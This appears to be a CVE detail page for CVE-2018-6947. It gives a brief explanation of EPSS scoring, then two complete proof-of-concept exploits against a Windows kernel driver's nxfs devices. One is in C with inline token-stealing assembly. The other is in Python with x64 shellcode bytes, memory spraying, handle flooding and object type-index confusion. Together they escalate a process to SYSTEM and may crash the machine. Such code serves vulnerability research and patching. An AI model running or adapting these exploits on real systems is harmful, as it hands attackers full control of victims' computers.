CVE-2018-6947 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#include “stdafx.h” #include <Windows.h> #define DEVICE L”\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061″ #define DEVICE2 L”\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}” #define IOCTL 0x00222014 #define IOCTL2 0x00222030 #define OUT_SIZE 0x90 #define IN_SIZE 0x10 #define KTHREAD_OFFSET 0x124 #define EPROCESS_OFFSET 0x050 #define PID_OFFSET 0x0b4 #define FLINK_OFFSET 0x0b8 #define TOKEN_OFFSET 0x0f8 #define SYSTEM_PID 0x004 #define PARENT_PID 0x140 __declspec(naked)VOID TokenStealingShellcode() { __asm{ xor eax, eax; mov eax, fs:[eax + KTHREAD_OFFSET]; mov eax, [eax + EPROCESS_OFFSET]; mov esi, [eax + PARENT_PID]; Get parent pid Loop1: mov eax, [eax + FLINK_OFFSET]; sub eax, FLINK_OFFSET; cmp esi, [eax + PID_OFFSET]; jne Loop1; mov ecx, eax; mov ebx, [eax + TOKEN_OFFSET]; mov edx, SYSTEM_PID; Search: mov eax, [eax + FLINK_OFFSET]; sub eax, FLINK_OFFSET; cmp[eax + PID_OFFSET], edx; jne Search; mov edx, [eax + TOKEN_OFFSET]; mov[ecx + TOKEN_OFFSET], edx; add esp, 0x58; add[esp], 5; ret 4; } } typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect ); typedef NTSTATUS(WINAPI *PNtFreeVirtualMemory)( HANDLE ProcessHandle, PVOID *BaseAddress, PULONG RegionSize, ULONG FreeType ); int main() { HMODULE module = LoadLibraryA(“ntdll.dll”); PNtAllocateVirtualMemory AllocMemory = (PNtAllocateVirtualMemory)GetProcAddress(module, “NtAllocateVirtualMemory”); PNtFreeVirtualMemory FreeMemory = (PNtFreeVirtualMemory)GetProcAddress(module, “NtFreeVirtualMemory”); SIZE_T size = 0x1000; PVOID address1 = (PVOID)0x05ffff00; NTSTATUS allocStatus = AllocMemory(GetCurrentProcess(), &address1, 0, &size, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); if (allocStatus != 0) { printf(“[x]Couldnt alloc page\n”); exit(-1); } printf(“[+] Allocated address at %p\n”, address1); *(ULONG *)0x05fffff4 = 5; *(ULONG *)0x060000ac = 0x20; *(ULONG *)0x060001dc = 0x05ffff00; *(ULONG *)(0x05ffff00 – 0x18) = 1; *(ULONG *)(0x05ffff00 – 0x14) = 0; PVOID address2 = (PVOID)0x1; SIZE_T size2 = 0x1000; allocStatus = AllocMemory(GetCurrentProcess(), &address2, 0, &size2, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); if (allocStatus != 0) { printf(“[x]Couldnt alloc page2\n”); exit(-1); } *(ULONG *)0x64 = (ULONG)&TokenStealingShellcode; printf(“[+] Mapped null page\n”); char inBuff[IN_SIZE]; char outBuff[OUT_SIZE]; HANDLE handle = 0; DWORD returned = 0; memset(inBuff, 0x41, IN_SIZE); memset(outBuff, 0x43, OUT_SIZE); *(ULONG *)inBuff = 0x00000190; *(ULONG *)(inBuff + 4) = 0x00000001; printf(“[+] Creating nxfs-net… device through IOCTL 222014\n”); handle = CreateFile(DEVICE, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); if (handle == INVALID_HANDLE_VALUE) { printf(“[x] Couldn’t open device\n”); exit(-1); } int ret = DeviceIoControl(handle, IOCTL, inBuff, IN_SIZE, outBuff, OUT_SIZE, &returned, 0); HANDLE handle2 = CreateFile(DEVICE2, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); char inBuff2[0x30]; char outBuff2[0x30]; printf(“[+] Triggering exploit…”); ret = DeviceIoControl(handle2, IOCTL2, inBuff2, 0x30, outBuff2, 0x30, &returned, 0); return 0; }

from ctypes import * from ctypes.wintypes import * import struct import sys import os MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 PAGE_EXECUTE_READWRITE = 0x00000040 GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 STATUS_INVALID_HANDLE = 0xC0000008 shellcode_len = 90 s = “” s += “\x65\x48\x8B\x04\x25\x88\x01\x00” #mov rax, [gs:0x188] s += “\x00” s += “\x48\x8B\x40\x70” #mov rax, [rax + 0x70] s += “\x48\x8B\x98\x90\x02\x00\x00” #mov rbx, [rax + 0x290] s += “\x48\x8B\x80\x88\x01\x00\x00” #mov rax, [rax + 0x188] s += “\x48\x2D\x88\x01\x00\x00” #sub rax, 0x188 s += “\x48\x39\x98\x80\x01\x00\x00” #cmp [rax + 0x180], rbx s += “\x75\xEA” #jne Loop1 s += “\x48\x89\xC1” #mov rcx, rax s += “\xBA\x04\x00\x00\x00” #mov rdx, 0x4 s += “\x48\x8B\x80\x88\x01\x00\x00” #mov rax, [rax + 0x188] s += “\x48\x2D\x88\x01\x00\x00” #sub rax, 0x188 s += “\x48\x39\x90\x80\x01\x00\x00” #cmp [rax + 0x180], rdx s += “\x75\xEA” #jne Loop2 s += “\x48\x8B\x80\x08\x02\x00\x00” #mov rax, [rax + 0x208] s += “\x48\x89\x81\x08\x02\x00\x00” #mov [rcx + 0x208], rax s += “\x48\x31\xC0” #xor rax,rax s += “\xc3” #ret shellcode = s ”’ * Convert a python string to PCHAR @Param string – the string to be converted. @Return – a PCHAR that can be used by winapi functions. ”’ def str_to_pchar(string): pString = c_char_p(string) return pString ”’ * Map memory in userspace using NtAllocateVirtualMemory @Param address – The address to be mapped, such as 0x41414141. @Param size – the size of the mapping. @Return – a tuple containing the base address of the mapping and the size returned. ”’ def map_memory(address, size): temp_address = c_void_p(address) size = c_uint(size) proc = windll.kernel32.GetCurrentProcess() nt_status = windll.ntdll.NtAllocateVirtualMemory(c_void_p(proc), byref(temp_address), 0, byref(size), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) #The mapping failed, let the calling code know if nt_status != 0: return (-1, c_ulong(nt_status).value) else: return (temp_address, size) ”’ * Write to some mapped memory. @Param address – The address in memory to write to. @Param size – The size of the write. @Param buffer – A python buffer that holds the contents to write. @Return – the number of bytes written. ”’ def write_memory(address, size, buffer): temp_address = c_void_p(address) temp_buffer = str_to_pchar(buffer) proc = c_void_p(windll.kernel32.GetCurrentProcess()) bytes_ret = c_ulong() size = c_uint(size) windll.kernel32.WriteProcessMemory(proc, temp_address, temp_buffer, size, byref(bytes_ret)) return bytes_ret ”’ * Get a handle to a device by its name. The calling code is responsible for * checking the handle is valid. @Param device_name – a string representing the name, ie \\\\.\\nxfs-net…. ”’ def get_handle(device_name): return windll.kernel32.CreateFileA(device_name, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) def main(): print “[+] Attempting to exploit uninitialised stack variable, this has a chance of causing a bsod!” print “[+] Mapping the regions of memory we require” #Try and map the first 3 critical regions, if any of them fail we exit. address_1, size_1 = map_memory(0x14c00000, 0x1f0000) if address_1 == -1: print “[x] Mapping 0x610000 failed with error %x” %size_1 sys.exit(-1) address_2, size_2 = map_memory(0x41414141, 0x100000) if address_2 == -1: print “[x] Mapping 0x41414141 failed with error %x” %size_2 sys.exit(-1) address_3, size_3 = map_memory(0xbad0b0b0, 0x1000) if address_3 == -1: print “[x] Mapping 0xbad0b0b0 failed with error %x” %size_3 sys.exit(-1) #this will hold our shellcode sc_address, sc_size = map_memory(0x42424240, 0x1000) if sc_address == -1: print “[x] Mapping 0xbad0b0b0 failed with error %x” %sc_size sys.exit(-1) #Now we write certain values to those mapped memory regions print “[+] Writing data to mapped memory…” #the first write involves storing a pointer to our shellcode #at offset 0xbad0b0b0+0xa8 buff = “\x40BBB” #0x42424240 bytes_written = write_memory(0xbad0b0b0+0xa8, 4, buff) write_memory(0x42424240, shellcode_len, shellcode) #the second write involves spraying the first memory address with pointers #to our second mapped memory. print “\t spraying unitialised pointer memory with userland pointers” buff = “\x40AAA” #0x0000000041414140 for offset in range(4, size_1.value, 8): temp_address = address_1.value + offset write_memory(temp_address, 4, buff) #the third write simply involves setting 0x41414140-0x18 to 0x5 #this ensures the kernel creates a handle to a TOKEN object. print “[+] Setting TOKEN type index in our userland pointer” buff = “\x05” temp_address = 0x41414140-0x18 write_memory(temp_address, 1, buff) print “[+] Writing memory finished, getting handle to first device” handle = get_handle(“\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061”) if handle == STATUS_INVALID_HANDLE: print “[x] Couldn’t get handle to \\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061” sys.exit(-1) #if we have a valid handle, we now need to send ioctl 0x222014 #this creates a new device for which ioctl 0x222030 can be sent in_buff = struct.pack(“<I”, 0x190) + struct.pack(“<I”, 0x1) + “AA” in_buff = str_to_pchar(in_buff) out_buff = str_to_pchar(“A”*0x90) bytes_ret = c_ulong() ret = windll.kernel32.DeviceIoControl(handle, 0x222014, in_buff, 0x10, out_buff, 0x90, byref(bytes_ret), 0) if ret == 0: print “[x] IOCTL 0x222014 failed” sys.exit(-1) print “[+] IOCTL 0x222014 returned success” #get a handle to the next device for which we can send the vulnerable ioctl. print “[+] Getting handle to \\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}” handle = get_handle(“\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}”) if handle == STATUS_INVALID_HANDLE: print “[x] Couldn’t get handle” sys.exit(-1) #this stage involves attempting to manipulate the Object argument on the stack. #we found that making repeated calles to CreateFileA increased this value. print “[+] Got handle to second device, now generating a load more handles” for i in range(0, 900000): temp_handle = get_handle(“\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}”) #coming towards the end, we send ioctl 0x222030, this has the potential to bluescreen the system. #we don’t care about the return code. print “[+] Sending IOCTL 0x222030” in_buff = str_to_pchar(“A”*0x30) out_buff = str_to_pchar(“B”*0x30) windll.kernel32.DeviceIoControl(handle, 0x222030, in_buff, 0x30, out_buff, 0x30, byref(bytes_ret), 0) #finally, we confuse the kernel by setting our object type index to 1. #this then points to 0xbad0b0b0, and namely 0xbad0b0b0+0xa8 for the close procedure(???) print “[+] Setting our object type index to 1” temp_address = 0x41414140-0x18 write_memory(temp_address, 1, “\x01”) #The process should now exit, where the kernel will attempt to clean up our dodgy handle #This will cause ….. if __name__ == ‘__main__’: main()